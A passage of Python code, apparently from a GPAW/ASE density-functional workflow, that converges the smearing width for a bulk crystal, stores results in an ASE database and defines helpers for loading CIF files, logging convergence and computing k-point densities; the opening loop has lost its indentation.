while (diff_primary>rela_tol or diff_second>rela_tol) and sw_iters <= 6:
atoms=bulk_builder(element)
gpaw_calc.__dict__['parameters']['occupations']['width']=calc_dict['occupations']['width']/2
calc_dict=gpaw_calc.__dict__['parameters']
atoms=bulk_builder(element)
if calc_dict['spinpol']:
atoms.set_initial_magnetic_moments(init_magmom*np.ones(len(atoms)))
atoms.set_calculator(gpaw_calc)
opt.optimize_bulk(atoms,step=solver_step,fmax=solver_fmax,location=element+"/"+'bulk'+'/'+'results_sw',extname='{}'.format(calc_dict['occupations']['width']))
db_sw.write(atoms,sw=calc_dict['occupations']['width'])
if sw_iters>=2:
fst=db_sw.get_atoms(id=sw_iters-1)
snd=db_sw.get_atoms(id=sw_iters)
trd=db_sw.get_atoms(id=sw_iters+1)
diff_primary=max(abs(snd.get_potential_energy()-fst.get_potential_energy()),
abs(trd.get_potential_energy()-fst.get_potential_energy()))
diff_second=abs(trd.get_potential_energy()-snd.get_potential_energy())
if temp_print == True:
temp_output_printer(db_sw,sw_iters,'sw',rep_location)
sw_iters+=1
sw_ls.append(calc_dict['occupations']['width'])
if sw_iters>=6:
if diff_primary>rela_tol or diff_second>rela_tol:
with paropen(rep_location,'a') as f:
parprint("WARNING: Max SMEARING-WIDTH iterations reached! System may not be converged.",file=f)
parprint("Computation Suspended!",file=f)
f.close()
sys.exit()
sw=sw_ls[-3]
gpaw_calc.__dict__['parameters']['occupations']['width']=sw
calc_dict=gpaw_calc.__dict__['parameters']
final_atom=db_sw.get_atoms(id=len(db_sw)-2)
k_density=mp2kdens(final_atom,calc_dict['kpts'])[0]
if calc_dict['spinpol']:
final_magmom=final_atom.get_magnetic_moments()
#writing final_atom to final_db
id=db_final.reserve(name=element)
if id is None:
id=db_final.get(name=element).id
db_final.update(id=id,atoms=final_atom,name=element,
h=calc_dict['h'],sw=calc_dict['occupations']['width'],xc=calc_dict['xc'],spin=calc_dict['spinpol'],
k_density=k_density,kpts=str(','.join(map(str, calc_dict['kpts']))))
else:
db_final.write(final_atom,id=id,name=element,
h=calc_dict['h'],sw=calc_dict['occupations']['width'],xc=calc_dict['xc'],spin=calc_dict['spinpol'],
k_density=k_density,kpts=str(','.join(map(str, calc_dict['kpts']))))
with paropen(rep_location,'a') as f:
parprint('Final Parameters:',file=f)
parprint('\t'+'h: '+str(calc_dict['h']),file=f)
parprint('\t'+'k_density: '+str(k_density),file=f)
parprint('\t'+'kpts: '+str(calc_dict['kpts']),file=f)
parprint('\t'+'sw: '+str(calc_dict['occupations']['width']),file=f)
if calc_dict['spinpol']:
parprint('\t'+'magmom: '+str(final_magmom),file=f)
parprint('Final Output: ',file=f)
parprint('\t'+'Lattice constants: '+str(np.round(final_atom.get_cell_lengths_and_angles()[:3],decimals=5))+'Ang',file=f)
parprint('\t'+'Lattice angles: '+str(np.round(final_atom.get_cell_lengths_and_angles()[3:],decimals=5))+'Degree',file=f)
parprint('\t'+'pot_e: '+str(np.round(final_atom.get_potential_energy(),decimals=5))+'eV',file=f)
f.close()
def bulk_builder(element):
    """Load the starting bulk structure for *element* from its CIF file.

    Reads ``orig_cif_data/<element>.cif`` with ASE's ``read`` and returns
    the resulting Atoms object.
    """
    return read('orig_cif_data' + '/' + element + '.cif')
def temp_output_printer(db, iters, key, location):
    """Append a convergence-progress report for parameter *key* to *location*.

    Fetches the three most recent rows (``iters-1``, ``iters``, ``iters+1``)
    from the ASE database *db* and writes the parameter values plus the
    pairwise absolute energy differences (rounded to 5 decimals, in eV)
    to the report file, using parallel-safe ``paropen``/``parprint``.

    Fix: dropped the redundant ``f.close()`` — the ``with paropen(...)``
    context manager already closes the handle on exit.
    """
    fst_r = db.get(iters - 1)
    snd_r = db.get(iters)
    trd_r = db.get(iters + 1)
    with paropen(location, 'a') as f:
        parprint('Optimizing parameter: ' + key, file=f)
        parprint('\t' + '1st: ' + str(fst_r[key]) + ' 2nd: ' + str(snd_r[key]) + ' 3rd: ' + str(trd_r[key]), file=f)
        parprint('\t' + '2nd-1st: ' + str(np.round(abs(snd_r['energy'] - fst_r['energy']), decimals=5)) + 'eV', file=f)
        parprint('\t' + '3rd-1st: ' + str(np.round(abs(trd_r['energy'] - fst_r['energy']), decimals=5)) + 'eV', file=f)
        parprint('\t' + '3rd-2nd: ' + str(np.round(abs(trd_r['energy'] - snd_r['energy']), decimals=5)) + 'eV', file=f)
def mp2kdens(atoms, kpts):
    """Convert a Monkhorst-Pack grid to per-axis k-point densities.

    For each reciprocal-lattice axis i the density is
    ``kpts[i] / (2 * pi * |b_i|)`` where ``b_i`` is the i-th row of the
    reciprocal cell of *atoms* (ASE's k-point-density convention).

    Parameters
    ----------
    atoms : object exposing ``get_reciprocal_cell()`` (e.g. ase.Atoms).
    kpts : sequence of int
        Number of k-points along each reciprocal axis.

    Returns
    -------
    list
        One density per axis, each rounded to 4 decimals.

    Fix: removed stray non-Python residue (' |' and trailing junk lines)
    that had been fused onto the return statement and made the original
    a syntax error; replaced the index loop with a comprehension.
    """
    recipcell = atoms.get_reciprocal_cell()
    return [
        np.round(n / (2 * np.pi * np.sqrt((b ** 2).sum())), decimals=4)
        for n, b in zip(kpts, recipcell)
    ]